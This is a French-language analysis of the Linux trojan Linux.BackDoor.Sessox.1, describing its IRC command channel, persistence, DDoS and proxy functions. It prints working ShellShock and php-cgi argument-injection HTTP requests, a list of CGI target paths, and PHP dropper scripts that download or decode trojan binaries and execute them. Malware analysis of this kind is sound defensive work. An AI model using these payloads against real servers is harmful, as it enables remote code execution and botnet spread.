Trojan backdoor ciblant Linux qui reçoit des commandes via un serveur-chat et utilise IRC (Internet Relay Chat). Après son lancement, il s'enregistre dans l'auto démarrage en utilisant le fichier "/etc/init.d/rc.local" ou, en cas d'absence de ce fichier, "/etc/rc.conf". Puis il lit le contenu de son fichier exécutable "/tmp/Help1", le crypte avec l'algorithme base64 et l'enregistre dans le fichier "/tmp/Help1.z". Il fait la même chose avec les fichiers "/tmp/Help2" et "/tmp/Help2.z". Puis il établit une connexion avec le serveur de gestion en envoyant la requête :
PASS %pass%\nNICK %nick%\nUSER %user% localhost localhost :%uptime%\noù %pass% - "44", %nick%, %user%, %uptime% possèdent la structure suivante :
char *GetUptime()
{
char *szUptime;
signed int i;
struct sysinfo info;
szUptime = (char *)malloc(0x15u);
i = 0;
memset(szUptime, 0, 0x15u);
do
szUptime[i++] = rand() % 26 + 'A';
while ( i < 20 );
*szUptime = 'm';
szUptime[1] = 'u';
szUptime[2] = 'm';
szUptime[3] = 'u';
szUptime[4] = '-';
sysinfo(&info);
if ( info.uptime > 0xD2F00 )
{
szUptime[5] = '[';
szUptime[6] = '1';
szUptime[7] = '0';
szUptime[8] = ']';
szUptime[9] = '-';
if ( info.uptime > 0x1A5E00 )
{
szUptime[6] = '2';
if ( info.uptime > 0x278D00 )
{
szUptime[6] = '3';
if ( info.uptime > 0x34BC00 )
{
szUptime[6] = '4';
if ( info.uptime > 0x41EB00 )
{
szUptime[6] = '5';
if ( info.uptime > 0x4F1A00 )
{
szUptime[6] = '6';
if ( info.uptime > 0x5C4900 )
{
szUptime[6] = '7';
if ( info.uptime > 0x697800 )
{
szUptime[6] = '8';
if ( info.uptime > 0x76A700 )
{
szUptime[6] = '9';
if ( info.uptime > 0x83D600 )
{
szUptime[6] = '1';
szUptime[8] = '0';
szUptime[9] = ']';
szUptime[10] = '-';
if ( info.uptime > 0xC5C100 )
{
szUptime[7] = '5';
if ( info.uptime > 0x107AC00 )
{
szUptime[6] = '2';
szUptime[7] = '0';
if ( info.uptime > 0x18B8200 )
{
szUptime[6] = '3';
if ( info.uptime > 0x20F5800 )
{
szUptime[6] = '4';
if ( info.uptime > 0x2932E00 )
szUptime[6] = '5';
}
}
}
}
}
}
}
}
}
}
}
}
}
}
return szUptime;
}Il peut exécuter les commandes suivantes :/p>
| Commande | Valeur |
|---|---|
| 376 | Régler le mode et accéder à l’IRC |
| 433 | envoyer au canal IRC des données sur la durée de son fonctionnement sur la machine infectée (uptime) |
| 422 | Régler le mode et accéder à l’IRC |
| PING | Envoyer la réponse PONG |
| NICK | Modifier le nick pour celui indiqué dans la commande |
| PRIVMSG | Exécuter une des fonctions suivantes (affichées ci-dessous) |
Fonctions:
| Commande | Valeur |
|---|---|
| PHPSCAN | Lancer le scan des scripts PHP (PHP, Scanner) |
| SOCKS5 | Lancer le serveur proxy (SOCKS5 Proxy) |
| SSSCAN | Lancer un scan pour rechercher la présence de la vulnérabilité ShellShock (ShellShock Scanner) |
| WEBDOS | Lancer une attaque sur un site via des requêtes GET répétitives (HTTP Flooder) |
Le Trojan peut attaquer un site web indiqué par les malfaiteurs en envoyant à répétition des requêtes GET. Le Trojan Linux.BackDoor.Sessox.1 peut également scanner le serveur pour rechercher la présence de la vulnérabilité ShellShock qui permet de lancer à distance un code aléatoire sur ce serveur. Le Trojan possède une liste de fichiers qui peuvent être insérés dans la requête GET :
/cgi-sys/entropysearch.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-mod/index.cgi
/cgi-bin/test.cgi
/cgi-bin-sdb/printenv
/admin.cgi
/cgi-bin/bash
/cgi-bin/hello
/cgi-bin/helpme
/cgi-bin/info.sh
/cgi-bin/php5-cli?
/cgi-bin/php5?
/cgi-bin/test-cgi
/cgi-bin/test.sh
/cgi-sys/guestbook.cgi
/cgi-sys/php5?
/phppath/cgi_wrapper?
/phppath/php?
/tmUnblock.cgi
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin/signon.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/tools/tools.pl
/phppath/cgi_wrapper
/phppath/php
/cgi-sys/FormMail-clone.cgi
/xul/
/gitweb/
/gitweb.cgi
/cgi-bin/
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php4
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/firmwarecfg
/cgi-bin/%2f/admin.html
/cgi-bin/admin.html
/sys-cgi
/cgi-bin/tree.php
/cgi-bin/w3mman2html.cgi
/cgi-bin/status/status.cgiLe script suivant est utilisé comme la charge utile lors de l'envoi des requêtes :
$a = \"%s\";
$b = \"%s\";
$c = sys_get_temp_dir();
$d = \"%s\";
$e = \"%s\";
$f = \"chmod 777\";
$g = \"file_put_contents\";
$h = \"system\";
$i = \"file_exists\";
$j = \"fopen\";
if ($i($c . \"/$d\"))
{
exit(1);
}else{
echo($c);
$g(\"$c/$d\", $j(\"$a\", \"r\"));
$g(\"$c/$e\", $j(\"$b\", \"r\"));
$h(\"$f \" . $c .\"/$d\");
$h(\"$f \" . $c .\"/$e\");
$h($c . \"/$d\");
$h($c . \"/$e\");
}Dans ce script, les variables a, b représentent les liens pour télécharger des fichiers de Trojans, les variables d, e représentent les noms sous lesquels il faut sauvegarder ces fichiers.
La requête GET suivante est générée à l'aide de ces données :
GET %file% HTTP/1.0\r\nCookie: () { :;} ;echo;/usr/bin/php -r %script%\r\nReferer: () { :;} ;echo;/usr/local/bin/php -r %script%\r\n\r\nOù, au lieu de %file%, toutes les variantes de la liste sont triées lors du cycle, et %script% est le script indiqué ci-dessus. Une adresse IP aléatoire est générée en tant qu’hôte pour les requêtes GET.
De la même façon, ce malware peut scanner des scripts PHP à l'aide de requêtes POST spécifiques afin de lancer des scripts sur le serveur. L'adresse IP générée aléatoirement est choisie comme hôte du destinataire. Le script suivant est utilisé pour générer la requête POST :
<?php
$bufferf = '%s';
$bufferf2 = '%s';
$a = sys_get_temp_dir();
$b = \"%s\";
$c = \"%s\";
$d = \"chmod 777\";
$e = \"system\";
$f = \"file_put_contents\";
$g = \"base64_decode\";
$h = \"chmod\";\n$i = \"file_exists\";
if ($i($a . \"/$c\"))
{
exit(1);
}else{
echo($a);
$bufferf = $g($bufferf);
$bufferf2 = $g($bufferf2);
$f(\"$a/$b\", $bufferf);
$f(\"$a/$c\", $bufferf2);
$h ($a.\"/\".$b,0777);
$e(\"$d \" . $a .\"/$b\");
$h ($a.\"/\".$c,0777);
$e(\"$d \" . $a .\"/$c\");
$e($a . \"/$c\");
$e($a . \"/$b\");
exit(1);
}
?>où les valeurs des variables bufferf et bufferf2 représentent respectivement les données des fichiers /tmp/Help1.z, /tmp/Help2.z (corps du backdoor en base64), tandis que les valeurs de b et c représentent "Help1", "Help2".
Les fichiers auxquels la requête peut être envoyée :
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php5-cgi
/cgi-bin/php-cgi.binPuis le script est inséré à la requête POST :
POST %file%?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%6E HTTP/1.1\r\nHost: %ip%\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %len%\r\nConnection: close\r\n\r\n%script%où %file% est le fichier de la liste affichée ci-dessus, %ip% est l'adresse IP aléatoire, %len% est la taille du script, %script% est le script présenté ci-dessus.
